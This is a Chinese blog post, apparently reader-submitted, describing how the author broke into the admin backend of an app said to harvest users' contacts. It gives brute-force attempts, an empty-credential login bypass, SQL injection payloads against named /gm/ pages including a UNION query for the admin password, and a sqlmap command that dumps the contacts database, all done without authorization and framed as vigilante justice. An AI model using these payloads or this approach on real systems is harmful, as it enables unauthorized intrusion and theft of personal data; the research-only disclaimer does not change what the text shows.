![看我如何拿下违法APP后台 看我如何拿下违法APP后台]()
前言
经过测试后,发现该app,在输入手机号和验证码之后,会申请获取手机号权限,一旦授予权限,app会立刻获取通讯录手机号和姓名,上去至数据库。性质及其恶劣!!
一、事情的开始
![看我如何拿下违法APP后台 看我如何拿下违法APP后台]()
![看我如何拿下违法APP后台 看我如何拿下违法APP后台]()
随便新建几个联系人。
进行抓包发现,电话号是进行加密的,看的不是很清晰明了。
那么渗透的意义就有了,为了不让更多人受害,为了匡扶世间正义,我挺身而出!
发现并不存在注入,也找不到备份文件,这个后台也不是开源的,那么只能进行爆破了。
开始爆破admin,尝试了10000次爆破后,还是没能登录进后台。
我试着把账号 密码 都为空,然后登录,居然进来了!!
域名/gm/sblist.php?m=123'or 1=1--+
域名/gm/alllist.php?i=0 'or 1=1--+
域名/gm/alllist.php?way=del
手动测试不出来,但确实存在注入,可用sqlmap 跑出来。
通过注入查看,users的用户名和密码,发现用户名都是一堆杂乱没规律的账号,猜测可能是管理员,为了保护admin账号,即使被注入,也不会很快发现admin的密码。管理员太天真了。
猜测管理员在添加小号时候,添加了一个用户名为空 密码也为空的账户,导致可以直接绕过登录进入后台,这就是账号为空 密码为空 可以进后台的秘密。
/gm/sblist.php?m=123%27union select username,password,qudaonum,4 from users where username = %27admin%27 -- #
密码解md5,解不开,可能是强密码。这里思路断了。
sql的权限 写一句话,找不到物理目录,无法写文件。
sqlmap 打包网站数据库,交给网安处理,结束我的渗透之旅。
执行:sqlmap -r sql.txt -D tongxunlu -T dianhuaben --dump --thread 5
![看我如何拿下违法APP后台 看我如何拿下违法APP后台]()
文章来源:网友投稿
![看我如何拿下违法APP后台 看我如何拿下违法APP后台]()
![看我如何拿下违法APP后台 看我如何拿下违法APP后台]()
![看我如何拿下违法APP后台 看我如何拿下违法APP后台]()
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
点赞
http://cn-sec.com/archives/119446.html
复制链接
复制链接
-
左青龙
- 微信扫一扫
-
-
右白虎
- 微信扫一扫
-
评论